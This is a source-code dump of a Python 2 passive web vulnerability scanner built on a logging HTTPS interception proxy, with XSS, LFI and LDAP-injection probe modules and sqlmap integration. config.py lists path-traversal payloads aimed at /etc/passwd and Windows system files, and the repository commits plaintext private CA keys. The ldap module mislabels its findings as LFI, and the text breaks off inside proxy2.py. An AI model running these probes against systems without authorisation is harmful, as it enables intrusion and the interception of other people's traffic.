├── Readme.md ├── config.py ├── lib ├── Log.py ├── RedisQueue.py ├── __init__.py ├── pocs │ ├── __init__.py │ ├── ldap.py │ ├── lfi.py │ └── xss.py └── utils.py ├── main.py ├── proxy ├── LoggedProxy.py ├── __init__.py ├── ca.crt ├── ca.key ├── cert.key ├── certs │ └── www.baidu.com.crt ├── models.py └── proxy2.py ├── scanner ├── __init__.py ├── fingerprint.py ├── sqlmap.py └── task.py └── setup_https_intercept.sh /Readme.md: -------------------------------------------------------------------------------- 1 | # LoggedProxy 2 | 3 | 记录流量到数据库中的http(s)代理服务器,支持分布式的被动式漏洞扫描 4 | 5 | 目前完成进度: 6 | 7 | * [x] proxy部分 8 | * [x] 被动扫描主体框架 9 | * [x] 集成反射型XSS的poc 10 | * [x] 集成通过sqlmapAPI进行sql注入检测 -------------------------------------------------------------------------------- /config.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | config={ 3 | 'redis_broker':'redis://localhost:6379/0', 4 | 'redis_backend':'redis://localhost:6379/0', 5 | 'redis_storage':{ 6 | 'host':'127.0.0.1', 7 | 'port':6379, 8 | 'db':1 9 | }, 10 | 'tasks':50, 11 | 'pocs':['xss','lfi','ldap'], 12 | 'poc_path':'/Users/image/PycharmProjects/PScan/lib/pocs/', 13 | 'poc_config':{ 14 | 'xss':{ 15 | 'xss_str':'' 16 | }, 17 | 'lfi':{ 18 | 'requests':''' 19 | ../../../../../../../../../../../../../../../boot.ini 20 | ../../../../../../../../../../../../../../../boot.ini.html 21 | C:\boot.ini 22 | C:\boot.ini 23 | C:\boot.ini.html 24 | %SYSTEMROOT%\win.ini 25 | %SYSTEMROOT%\win.ini 26 | %SYSTEMROOT%\win.ini.html 27 | ../../../../../../../../../../../../../../../etc/passwd%00.html 28 | /etc/passwd%00.html 29 | ../../../../../../../../../../../../../../../etc/passwd 30 | ../../../../../../../../../../../../../../../etc/passwd 31 | ../../../../../../../../../../../../../../../etc/passwd.html 32 | ....//....//....//....//....//....//....//....//....//....//etc/passwd 33 | ../../../../../../../../../../../../../../../../etc/passwd%00 34 | 
....//....//....//....//....//....//....//....//....//....//etc/passwd%00 35 | /etc/passwd 36 | https://raw.githubusercontent.com/code-scan/GourdScan/master/README.md? 37 | '''.strip().split("\n"), 38 | 'responces':''' 39 | java.io.FileNotFoundException\: 40 | java.lang.Exception\: 41 | java.lang.IllegalArgumentException\: 42 | java.net.MalformedURLException\: 43 | The server encountered an internal error \(.*\) that prevented it from fulfilling this request. 44 | fread\(\)\: 45 | for inclusion '\(include_path= 46 | Failed opening requiredv 47 | <b>Warning</b>\: file\( 48 | <b>Warning</b>\: file_get_contents\( 49 | root:x\:0\:0\:root\: 50 | Warning\: fopen\( 51 | No such file or directory 52 | # GourdScan 53 | '''.strip().split("\n") 54 | }, 55 | 'ldap':{ 56 | 'requests':''' 57 | ^(%23$!@%23$)(()))****** 58 | '''.strip().split("\n"), 59 | 'responces':''' 60 | supplied argument is not a valid ldap 61 | javax.naming.NameNotFoundException 62 | LDAPException 63 | com.sun.jndi.ldap 64 | Search: Bad search filter 65 | Protocol error occurred 66 | Size limit has exceeded 67 | An inappropriate matching occurred 68 | A constraint violation occurred 69 | The syntax is invalid 70 | Object does not exist 71 | The alias is invalid 72 | The distinguished name has an invalid syntax 73 | The server does not handle directory requests 74 | There was a naming violation 75 | There was an object class violation 76 | Results returned are too large 77 | Unknown error occurred 78 | Local error occurred 79 | The search filter is incorrect 80 | The search filter is invalid 81 | The search filter cannot be recognized 82 | Invalid DN syntax 83 | No Such Object 84 | IPWorksASP.LDAP 85 | Module Products.LDAPMultiPlugins 86 | '''.strip().split("\n") 87 | } 88 | }, 89 | 'enable_sqlmap':True, 90 | 'sqlmap_api':'http://127.0.0.1:8775', 91 | 'sqlmap':{ 92 | 'ban':[] 93 | }, 94 | 'log':{ 95 | "version": 1, 96 | "disable_existing_loggers": False, 97 | 98 | # 日志格式 99 | "formatters": { 100 | "simple": { 
101 | "format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s" 102 | } 103 | }, 104 | 105 | "handlers": { 106 | 107 | # 定义控制台日志的级别和样式 108 | "console": { 109 | "class": "logging.StreamHandler", 110 | "level": "DEBUG", 111 | "formatter": "simple", 112 | "stream": "ext://sys.stdout" 113 | }, 114 | 115 | # 定义INFO(以上)级别的日志处理器 116 | "info_file_handler": { 117 | "class": "logging.handlers.RotatingFileHandler", 118 | "level": "INFO", 119 | "formatter": "simple", 120 | "filename": "./logs/info.log", 121 | "maxBytes": 10485760, 122 | "backupCount": 20, 123 | "encoding": "utf8" 124 | }, 125 | 126 | # 定义ERROR以上)级别的日志处理器 127 | "error_file_handler": { 128 | "class": "logging.handlers.RotatingFileHandler", 129 | "level": "ERROR", 130 | "formatter": "simple", 131 | "filename": "./logs/errors.log", 132 | "maxBytes": 10485760, 133 | "backupCount": 20, 134 | "encoding": "utf8" 135 | } 136 | }, 137 | 138 | # 定义不同name的logger的日志配置 139 | "loggers": { 140 | "mymodule": { 141 | "level": "ERROR", 142 | "handlers": [ 143 | "info_file_handler" 144 | ], 145 | "propagate": "no" 146 | } 147 | }, 148 | 149 | # 定义全局日志配置 150 | "root": { 151 | "level": "DEBUG", 152 | "handlers": [ 153 | "console", 154 | "info_file_handler", 155 | "error_file_handler" 156 | ] 157 | } 158 | } 159 | 160 | 161 | } -------------------------------------------------------------------------------- /lib/Log.py: -------------------------------------------------------------------------------- 1 | from config import config 2 | import logging 3 | import logging.config 4 | 5 | logging.config.dictConfig(config['log']) 6 | -------------------------------------------------------------------------------- /lib/RedisQueue.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from config import config 3 | import redis 4 | 5 | redis_store=redis.StrictRedis(config['redis_storage']) 6 | 7 | class RedisQueue(object): 8 | def __init__(self, name, namespace='queue', 
**redis_kwargs): 9 | self.key = "%s:%s" % (namespace, name) 10 | 11 | def qsize(self): 12 | return redis_store.llen(self.key) 13 | 14 | def put(self, item): 15 | redis_store.rpush(self.key, item) 16 | 17 | def get_wait(self, timeout=None): 18 | item = redis_store.blpop(self.key, timeout=timeout) 19 | return item 20 | 21 | def get_nowait(self): 22 | item = redis_store.lpop(self.key) 23 | return item 24 | -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imagemlt/LoggedProxy/c35d5412864f8da39e21aa6dbdb38a2482f4283b/lib/__init__.py -------------------------------------------------------------------------------- /lib/pocs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imagemlt/LoggedProxy/c35d5412864f8da39e21aa6dbdb38a2482f4283b/lib/pocs/__init__.py -------------------------------------------------------------------------------- /lib/pocs/ldap.py: -------------------------------------------------------------------------------- 1 | from lib.utils import * 2 | import requests 3 | import copy 4 | from urllib import urlencode 5 | 6 | 7 | def poc(request,config): 8 | exists = 0 9 | result = '' 10 | try: 11 | reqs = config['requests'] 12 | resp = config['responces'] 13 | headers,cookiesJar=parseHeaders(request['headers']) 14 | url,get_params=url2params(request) 15 | session=requests.session() 16 | for p in get_params: 17 | new_params=copy.copy(get_params) 18 | for fi in reqs: 19 | new_params[p]=fi 20 | new_url=url+'?'+urlencode(new_params) 21 | if(request['method']=='GET'): 22 | back_content=session.get(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 23 | elif(request['method']=='POST'): 24 | back_content=session.post(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 25 | for res in resp: 26 | if res in 
back_content: 27 | exists+=1 28 | result+='lfi found:get param %s\n'%p 29 | except Exception,e: 30 | print (e.message) 31 | finally: 32 | return exists,result 33 | 34 | if __name__=='__main__': 35 | print poc({'url':"http://127.0.0.1:5555/echo.php?1=a",'headers':{},'method':'GET'},{'xss_str':'mdzz'}) -------------------------------------------------------------------------------- /lib/pocs/lfi.py: -------------------------------------------------------------------------------- 1 | from lib.utils import * 2 | import requests 3 | import copy 4 | from urllib import urlencode 5 | 6 | 7 | def poc(request,config): 8 | exists = 0 9 | result = '' 10 | try: 11 | reqs = config['requests'] 12 | resp = config['responces'] 13 | headers,cookiesJar=parseHeaders(request['headers']) 14 | url,get_params=url2params(request) 15 | session=requests.session() 16 | for p in get_params: 17 | new_params=copy.copy(get_params) 18 | for fi in reqs: 19 | new_params[p]=fi 20 | new_url=url+'?'+urlencode(new_params) 21 | if(request['method']=='GET'): 22 | back_content=session.get(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 23 | elif(request['method']=='POST'): 24 | back_content=session.post(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 25 | for res in resp: 26 | if res in back_content: 27 | exists+=1 28 | result+='lfi found:get param %s\n'%p 29 | except Exception,e: 30 | print (e.message) 31 | finally: 32 | return exists,result 33 | 34 | if __name__=='__main__': 35 | print poc({'url':"http://127.0.0.1:5555/echo.php?1=a",'headers':{},'method':'GET'},{'xss_str':'mdzz'}) -------------------------------------------------------------------------------- /lib/pocs/xss.py: -------------------------------------------------------------------------------- 1 | from lib.utils import * 2 | import requests 3 | import copy 4 | from urllib import urlencode 5 | 6 | 7 | def poc(request,config): 8 | exists = 0 9 | result = '' 10 | try: 11 | xss_str = config['xss_str'] 12 | 
headers,cookiesJar=parseHeaders(request['headers']) 13 | url,get_params=url2params(request) 14 | session=requests.session() 15 | for p in get_params: 16 | new_params=copy.copy(get_params) 17 | new_params[p]=xss_str 18 | new_url=url+'?'+urlencode(new_params) 19 | if(request['method']=='GET'): 20 | back_content=session.get(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 21 | elif(request['method']=='POST'): 22 | back_content=session.post(new_url,cookies=cookiesJar,headers=headers,timeout=5).content 23 | if xss_str in back_content: 24 | exists+=1 25 | result+='xss found:get param %s\n'%p 26 | except Exception,e: 27 | print (e.message) 28 | finally: 29 | return exists,result 30 | 31 | if __name__=='__main__': 32 | print poc({'url':"http://127.0.0.1:5555/echo.php?1=a",'headers':{},'method':'GET'},{'xss_str':'mdzz'}) -------------------------------------------------------------------------------- /lib/utils.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import urlparse 4 | def cookie2jar(cookies): 5 | cookie=cookies.strip(';').split(';') 6 | cookie_dict={} 7 | for cook in cookie: 8 | k,v=cook.strip().split('=',1) 9 | cookie_dict[k]=v 10 | cookiesJar=requests.utils.cookiejar_from_dict(cookie_dict,cookiejar=None,overwrite=True) 11 | return cookiesJar 12 | 13 | def parseHeaders(headers): 14 | heads={} 15 | cookiesJar=None 16 | for head in headers: 17 | if(head != 'Cookie'): 18 | heads[head]=headers[head] 19 | else: 20 | cookiesJar=cookie2jar(headers[head]) 21 | return heads,cookiesJar 22 | 23 | def req2file(request): 24 | result=request['requestline'] 25 | for head in request['headers']: 26 | result=result+"\r\n"+head+":"+request['headers'][head] 27 | result=result+"\r\n\r\n"+request['req_body'] 28 | return result 29 | 30 | 31 | def url2params(request): 32 | url=request['url'].split('?',1) 33 | query = urlparse.urlparse(request['url']).query 34 | return url[0],dict([(k, 
v[0]) for k, v in urlparse.parse_qs(query).items()]) 35 | 36 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from proxy import LoggedProxy 3 | from proxy.models import * 4 | from config import config 5 | from scanner.task import scan, sqlmap_scan 6 | from scanner.fingerprint import gen_fingerprint 7 | from lib.Log import * 8 | from scanner.sqlmap import * 9 | from collections import Iterable 10 | import json 11 | import Queue 12 | import threading 13 | import ctypes 14 | import inspect 15 | 16 | 17 | scan_tasks=Queue.Queue(config['tasks']) 18 | terminate_mark=False 19 | 20 | def _async_raise(tid, exctype): 21 | """raises the exception, performs cleanup if needed""" 22 | tid = ctypes.c_long(tid) 23 | if not inspect.isclass(exctype): 24 | exctype = type(exctype) 25 | res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype)) 26 | if res == 0: 27 | raise ValueError("invalid thread id") 28 | elif res != 1: 29 | # """if it returns a number greater than one, you're in trouble, 30 | # and you should call it again with exc=NULL to revert the effect""" 31 | ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None) 32 | raise SystemError("PyThreadState_SetAsyncExc failed") 33 | 34 | 35 | def stop_thread(thread): 36 | _async_raise(thread.ident, SystemExit) 37 | 38 | 39 | 40 | 41 | def proxy_service(): 42 | LoggedProxy.test(HandlerClass=LoggedProxy.LogRequestHandler) 43 | 44 | def task_service(): 45 | while(True): 46 | if terminate_mark: 47 | break 48 | try: 49 | task_count=scan_tasks.qsize() 50 | session=DBSession() 51 | Logs=session.query(Log).filter(Log.sended==False).limit(config['tasks']-task_count).all() 52 | if isinstance(Logs,Iterable): 53 | for l in Logs: 54 | request={ 55 | 'id':l.id, 56 | 'method':l.method, 57 | 'url':l.url, 58 | 'requestline':l.requestline, 59 | 
'headers':json.loads(l.headers), 60 | 'req_body':l.req_body, 61 | 'time':l.time, 62 | 'sended':l.sended, 63 | 'dealed':l.dealed 64 | } 65 | logging.info("%s,%s"%(request['method'],request['url'])) 66 | for poc in config['pocs']: 67 | scan_tasks.put(scan.delay(request,poc)) 68 | if(config['enable_sqlmap']): 69 | scan_tasks.put(sqlmap_scan.delay(request)) 70 | l.sended=True 71 | session.commit() 72 | except Exception,e: 73 | logging.error(e.message) 74 | 75 | def result_service(): 76 | session=DBSession() 77 | while(True): 78 | if terminate_mark: 79 | break 80 | try: 81 | job=scan_tasks.get() 82 | if job.ready(): 83 | result=job.get() 84 | logging.debug(result) 85 | if(not result['exists'] and result['found']>0): 86 | res=Result() 87 | res.fingerprint=gen_fingerprint(result['request'],result['type']) 88 | res.type=result['type'] 89 | res.requestId=result['request']['id'] 90 | res.result=json.dumps(result['result']) 91 | session.add(res) 92 | session.commit() 93 | session.query(Log).filter(Log.id==result['request']['id']).update({'dealed':True}) 94 | else: 95 | scan_tasks.put(job) 96 | session.commit() 97 | except Exception,e: 98 | logging.error(e.message) 99 | 100 | 101 | if __name__=='__main__': 102 | task_thread=threading.Thread(target=task_service) 103 | result_thread=threading.Thread(target=result_service) 104 | proxy_thread=threading.Thread(target=proxy_service) 105 | task_thread.start() 106 | 107 | result_thread.start() 108 | proxy_thread.start() 109 | threads=[task_thread,result_thread,proxy_thread] 110 | try: 111 | while True: 112 | for thread in threads: 113 | if not thread.isAlive(): 114 | logging.error("thread %s terminated,trying to recall it"%(thread.getName())) 115 | logging.info("recall thread %s succeed"%(thread.getName())) 116 | except KeyboardInterrupt,e: 117 | logging.error('user termiated') 118 | for thread in threads: 119 | stop_thread(thread) 120 | 121 | -------------------------------------------------------------------------------- 
/proxy/LoggedProxy.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from models import * 3 | from proxy2 import * 4 | import json 5 | 6 | 7 | class LogRequestHandler(ProxyRequestHandler): 8 | def request_handler(self, req, req_body): 9 | session=DBSession() 10 | log=Log() 11 | log.method=req.command 12 | log.url=req.path 13 | log.requestline=req.raw_requestline 14 | log.headers=json.dumps(dict(req.headers)) 15 | log.req_body=req_body 16 | session.add(log) 17 | session.commit() 18 | session.close() 19 | 20 | def test(HandlerClass=ProxyRequestHandler, ServerClass=ThreadingHTTPServer, protocol="HTTP/1.1"): 21 | if sys.argv[1:]: 22 | ip=sys.argv[1] 23 | port = int(sys.argv[2]) 24 | else: 25 | ip="::1" 26 | port = 5678 27 | server_address = (ip, port) 28 | 29 | HandlerClass.protocol_version = protocol 30 | httpd = ServerClass(server_address, HandlerClass) 31 | 32 | sa = httpd.socket.getsockname() 33 | print "Serving HTTP Proxy on", sa[0], "port", sa[1], "..." 
34 | httpd.serve_forever() 35 | 36 | if __name__ == '__main__': 37 | test(HandlerClass=LogRequestHandler) 38 | -------------------------------------------------------------------------------- /proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imagemlt/LoggedProxy/c35d5412864f8da39e21aa6dbdb38a2482f4283b/proxy/__init__.py -------------------------------------------------------------------------------- /proxy/ca.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICpDCCAYwCCQDcHOPdAQicbTANBgkqhkiG9w0BAQsFADAUMRIwEAYDVQQDDAlw 3 | cm94eTIgQ0EwHhcNMTkwMjE2MDEzMDM4WhcNMjkwMjEzMDEzMDM4WjAUMRIwEAYD 4 | VQQDDAlwcm94eTIgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCz 5 | 7pGDAbL09jkt+fyD5Y5gh3sv8y6f3KO2cDprcvl127GYjcgnuSl2W1618NbPulxc 6 | TSmw37uwbrlbk/WzhdzfSghOdO1tmYRn2RTyvrt1pUyFiF8Wxn1ZzlxcP50PIiw0 7 | BHWTvFL7Y53gUUs1sh8qBMMLRBtTNd48gPdVdnsd4FmEamuuoW4zN1VXtXbrqPna 8 | rAlsuKV2oBQEPBhY8Tai+1QWUMyoqQ0kTX5pLeOuuztU5V+XnCF4wmHxlA1vlHNr 9 | Qz0v4QqHifGbYh5X/dITa2h2/PlYN+++Sy6Yp/471NFU9B/QMinyAoiRyvJkbPCx 10 | GFjY1cR3IzuuXo951d55AgMBAAEwDQYJKoZIhvcNAQELBQADggEBAIRyWkuA7ClW 11 | rp+Gw1nNwTAtTL+0nM3m05NEtHh2oU5p1xOCB/8JK2wO5SqhEN3j17fIrJWQ3JXZ 12 | WotmHVYLSO4VWenj6Tmt6k74AIpRrHZumA5siVN4432Cizox67MnnI+576ufPxDi 13 | BSR4ds0/NqcFjlItAlY21bV7SQVNFkBUytr4H9rKFtx73dl4S3+dsuLJqHb/2t2/ 14 | ET5wwytAsnd0qRJAlU6P4euoCqnitNbSkKa8Fa+TFbrpGVX/Ie/rb5c8RIzA/L4J 15 | Lz3nGo/DhtR1+xyXynqA+3gdIPkTf5ksCw/C4V86TnmVrnkILeZAYKe0QQJopOCq 16 | 4r9oY0HBd8g= 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /proxy/ca.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAs+6RgwGy9PY5Lfn8g+WOYId7L/Mun9yjtnA6a3L5dduxmI3I 3 | J7kpdltetfDWz7pcXE0psN+7sG65W5P1s4Xc30oITnTtbZmEZ9kU8r67daVMhYhf 4 | 
FsZ9Wc5cXD+dDyIsNAR1k7xS+2Od4FFLNbIfKgTDC0QbUzXePID3VXZ7HeBZhGpr 5 | rqFuMzdVV7V266j52qwJbLildqAUBDwYWPE2ovtUFlDMqKkNJE1+aS3jrrs7VOVf 6 | l5wheMJh8ZQNb5Rza0M9L+EKh4nxm2IeV/3SE2todvz5WDfvvksumKf+O9TRVPQf 7 | 0DIp8gKIkcryZGzwsRhY2NXEdyM7rl6PedXeeQIDAQABAoIBAGGfLTmb4WFAedN1 8 | D0jscivzNaXVVdWMGxKvnzKO5cPJF3kCa7cJofJCLoeeDJ4VqWi2wMjjCmz2FgEW 9 | rLbjCOvoucr/a5YMNac2Q0RUsVZqAbNtQtITjQz9hmTSar88NilexgAKrCcSbCS5 10 | Vonig0AD52KkaALkdhfzjL3Ek5WoKxu0PF6jhRDeGNIzmkhi9yNqypWMzFVizydR 11 | eWsiZw6W74eop2qHKoNwVf2gKzD06Jd8y8iqqSIOs6Tb/U95oLXU9aM6+LyyngC3 12 | jYBYOok70uRoM9TY6/tr4yP/MhDBoQPLIVWivLEgpck0lnno79C4aHvmqPLTDERG 13 | DYZhIMUCgYEA4ZT+dNA/ZsvWColXUCZ9SATNXz7E4k8AdCAH6oFEOCZYlPQOIUO6 14 | 4K5PPKFC3kVrgQ7lqQ1VjS+22xc8RBRkBvtd6heNSlSvO9d6l2j3gixkuDXOLTvM 15 | KxFhBr4qiKURiQ8687C+PmCwQ/0/EmwMiofY0XcDMStGYWNoUS0AMg8CgYEAzDHA 16 | Cr97iiP5p5gDnmwWQAqSeGJFDECIkw2tRAGJQNxrsmD9etLfduFDQYAbZbTg/Ce0 17 | +I7hXCiPppelwD7HkNIz9q93WoMqHiTqnTtfTv3wsUZ7KbMc1PdGMVRBnWsFBG0t 18 | OxBecOvvNwY2cgjIHrpkhPt9+QKkRtkCg1tLTvcCgYEAxXwIn/9H4hiFE8hUtghc 19 | GVaK7N0ow+7huMfp5jSwom9/kTdvv1NqIRS4rZ2Hysr/aIbALBVOVkH1VSysR/WJ 20 | 9ErPVwazXOVyW3MzEaaFOGLg8hu4mgUFopaeWKbW2bWY+mJo+7o5cqZ26a6lLt2E 21 | xSpUeFw2YS8/eDbstlQtHaUCgYBYNxIJUqozhtE/ZzwBAB8osaiPm5zK60JVjW4S 22 | WDuMqu1YFfDMVDe4ax8cOBUd/mPIa/sR+uA/aUKOLSutfzHGThmm9C0zDEFw3nAB 23 | V3oYbTrDy3hADqJhGybW/tiOAoMbY3NL9glm7XbeJa/12fdi1xHAJcpJfqur8+rT 24 | BujlBwKBgHOz9G3KiXWpHi6EUyN4IW7aUJQDlPDDPz6DNW0nrBtsmXFSFy6JiFzp 25 | 9J1mq8TcwJCUHnBE/H6zzbZwr0E4bVAQFIleFbunSct822ix8J4DxX3NOlb6g2tk 26 | 92K+9vM0+mfFWiwjeRy/7GU2eJnpG8G2cOKrCufGTpDRweVcicWD 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /proxy/cert.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEpAIBAAKCAQEAtZ8RFyqqGqRLVDbXrO9n+bPa0wTVBMGZ+I5Lto37gNs/7ZKe 3 | pTPoEBzQg6j/eMdHbpTPyurYMtJP1Tc43rxJOh+wPk1EPtb2MiHdtWmZ1vkUmmrv 4 | 
tqOVuf16kP9LKyZdhuReNlutGSrrddnIpmBg2rpahIwo7l9nBXSwnvNjSiYMWvwe 5 | PbCi+NlRMiIZ1mS4Aey6vkQevvkv5AH/+Ra/qu+I+dsFcj6T6hkrPt0bPXcXnXAb 6 | mEF/oZ8hj3dSOCgN1a5YmyvtX1cXfv/ghqSj2RSS1pom6K0opZmXibBo2MyfrwP+ 7 | 06vJv4AeQ8FmiQ9+89hAdVGN4uy7zmPrxxU9iwIDAQABAoIBAQCADid+rhZBspVq 8 | S0DGLgahiK5BGqcXM2ncVngLvxAVSoFIgJha4r48nhRmwEFgZyF2VnYsHGlTa/Xd 9 | 35G5eggnczBQvSnhJK9xqW8o+cv+RqDAP6XEoJJxEMfadCYLxoErGtlSelER7bEW 10 | 5vcSV+HyVnJ8AlbZu2pn7l6ZtAHNxNQwPiHe4GgjqkjxX4SbbtSqSP7USs/p/wfV 11 | n5FgsCyHe/NKjXAU4gh1t5RkAVOpaJnlXyyWE+EPs3NKY0CSzITSjx+WI+zX0ksa 12 | p+bBSgFCra92Rxf+i3QPsLzRaftXADd5qxTvwMzODFerDK6TpQYN4+69W0sH7tnc 13 | iNbIpwwBAoGBAO+QLKb51L+6RTYkGjnvMFctnwZatBDpG0IfxBpbhpqvg+JfX/CS 14 | xu5BhP1O0gxA0y9Ph6Uy49WoRBm36U3dg3JY7DCdNdZMeVpBmwiTNut3BM71nWMY 15 | t19ycXmP80abQMklO99icTQhCCPt2p2fWmSVpMmFT8dLP661Il0N3rMVAoGBAMIV 16 | KzMG3DQQYd00zzLmkKeasuJSIqVMkLX8C6+4JbM2DhK2Ih0xRdg7BCrywmrwQEE5 17 | YaBLesmwM01ZjqpZJvVgSEK7oxqkmXfZehwnoomCbAfB1mRmz5EG/G+Dzm/izP+z 18 | yMBEyX7YH9XcyqG7JmxYpl05WPQjDl7w/1K0QtYfAoGAGnNMutLyzoh+g8/QpXzn 19 | VXjQCh+RqhxSyiY/vLlGT2X5pdDqAuHx3PSW/nDpeDjgGGUrkO3hggGmI0DPHa3L 20 | iaCP035IJ3UiIPkFaRj4A1+MxF0SF5LvDDbSmJ1wOueBa7QUvEFeRmcvQuhMLwMd 21 | M+Xh3+48NMD2MxAEz0lswVECgYBg+AKldAABY04CH6iGXfxYQUqvGSqGPELxKgUM 22 | vozXhWJypt1UiJHE/3eNnczVcUQpUmoclJm8u3RmaSCGrBRy9LAl52oOnb6vytDf 23 | 0E29NpSTK53afCOo6jyl2s0ByedyunjK15N09LazO6ViOQdxirlUSprPH9TGStLG 24 | l5ntMQKBgQDP9cdgy2vuyd2BtaQCjjs+pdLe5YYhJu0D6BEUqhxSXqwGk+lAI6tV 25 | TJHJUdNzm3KC8SuQyG+9B/Yfxnm4A19xbWqUx3Edda5XWPjUugtQcMC0wj5eIFH6 26 | 9SF9sQLQYkcuZKG0HC3SYQmYlokzZMLoetXWTT0khLN5Hic11i3lMw== 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /proxy/certs/www.baidu.com.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICpTCCAY0CBgFo8+6TbjANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAlwcm94 3 | eTIgQ0EwHhcNMTkwMjE2MDEzMjA1WhcNMjkwMjEzMDEzMjA1WjAYMRYwFAYDVQQD 4 | 
DA13d3cuYmFpZHUuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA 5 | tZ8RFyqqGqRLVDbXrO9n+bPa0wTVBMGZ+I5Lto37gNs/7ZKepTPoEBzQg6j/eMdH 6 | bpTPyurYMtJP1Tc43rxJOh+wPk1EPtb2MiHdtWmZ1vkUmmrvtqOVuf16kP9LKyZd 7 | huReNlutGSrrddnIpmBg2rpahIwo7l9nBXSwnvNjSiYMWvwePbCi+NlRMiIZ1mS4 8 | Aey6vkQevvkv5AH/+Ra/qu+I+dsFcj6T6hkrPt0bPXcXnXAbmEF/oZ8hj3dSOCgN 9 | 1a5YmyvtX1cXfv/ghqSj2RSS1pom6K0opZmXibBo2MyfrwP+06vJv4AeQ8FmiQ9+ 10 | 89hAdVGN4uy7zmPrxxU9iwIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQBc5BnB9xjy 11 | W2XuYnSWHXKaZ6D1VbROeVMgQIoHlfLxjt65YSh2dp6KAgJ30J3MBKmi6w4tGkJx 12 | 13xHiIGXQNZSeepfLG3OQH0hhA+b96g5/PfAlgNv6ym8b/kw++w5DXWMMeCexQB4 13 | v4mAlGQC9Kkmz27LimGqfZpf7JHmY9A1udfUtRjixsodiyfzQpzt1PTtUVr79lIl 14 | l9C0e1oBUsZS0K54c1rjxlNaOa5JadgJxdXfdnJQvsaCEgwGlRkd8PT/aJz7gntO 15 | +/t3j/u2h2TKNn7jhzM06YJGi5qHEzX09N8A4LC+02gEJjuzE7ZzIyHzSwOsgMsI 16 | X9nvR62LN4dg 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /proxy/models.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from sqlalchemy import Column, String, Text, DateTime, Integer, Boolean, BLOB, ForeignKey, create_engine 3 | from sqlalchemy.orm import sessionmaker 4 | from sqlalchemy.ext.declarative import declarative_base 5 | import datetime 6 | 7 | Base = declarative_base() 8 | 9 | class Log(Base): 10 | # 表示请求记录 11 | __tablename__ = 'Log' 12 | 13 | # 表结构 14 | 15 | id=Column(Integer,primary_key=True,autoincrement=True) 16 | method=Column(String(20)) # 请求方法 17 | url=Column(String(1024)) 18 | requestline=Column(String(1024)) 19 | headers=Column(String(1024)) 20 | req_body=Column(BLOB,nullable=True) 21 | time=Column(DateTime,default=datetime.datetime.utcnow()) 22 | sended=Column(Boolean,default=False) 23 | dealed=Column(Boolean,default=False) 24 | 25 | class Result(Base): 26 | __tablename__='Result' 27 | 28 | id=Column(Integer,primary_key=True,autoincrement=True) 29 | 
requestId=Column(Integer,ForeignKey('Log.id')) 30 | fingerprint=Column(String(1024)) 31 | type=Column(String(20)) 32 | time = Column(DateTime, default=datetime.datetime.utcnow()) 33 | result=Column(Text) 34 | 35 | 36 | class Rule(Base): 37 | __tablename__='Rule' 38 | 39 | id=Column(Integer,primary_key=True,autoincrement=True) 40 | type=Column(String(10)) 41 | rule=Column(Text) 42 | 43 | 44 | engine=create_engine('sqlite:////tmp/log.db') 45 | 46 | Base.metadata.create_all(engine) 47 | 48 | DBSession =sessionmaker(bind=engine) 49 | 50 | 51 | -------------------------------------------------------------------------------- /proxy/proxy2.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import os 4 | import socket 5 | import ssl 6 | import select 7 | import httplib 8 | import urlparse 9 | import threading 10 | import gzip 11 | import zlib 12 | import time 13 | import json 14 | import re 15 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler 16 | from SocketServer import ThreadingMixIn 17 | from cStringIO import StringIO 18 | from subprocess import Popen, PIPE 19 | from HTMLParser import HTMLParser 20 | 21 | 22 | def with_color(c, s): 23 | return "\x1b[%dm%s\x1b[0m" % (c, s) 24 | 25 | def join_with_script_dir(path): 26 | return os.path.join(os.path.dirname(os.path.abspath(__file__)), path) 27 | 28 | 29 | class ThreadingHTTPServer(ThreadingMixIn, HTTPServer): 30 | address_family = socket.AF_INET6 31 | daemon_threads = True 32 | 33 | def handle_error(self, request, client_address): 34 | # surpress socket/ssl related errors 35 | cls, e = sys.exc_info()[:2] 36 | if cls is socket.error or cls is ssl.SSLError: 37 | pass 38 | else: 39 | return HTTPServer.handle_error(self, request, client_address) 40 | 41 | 42 | class ProxyRequestHandler(BaseHTTPRequestHandler): 43 | cakey = join_with_script_dir('ca.key') 44 | cacert = join_with_script_dir('ca.crt') 45 | certkey = 
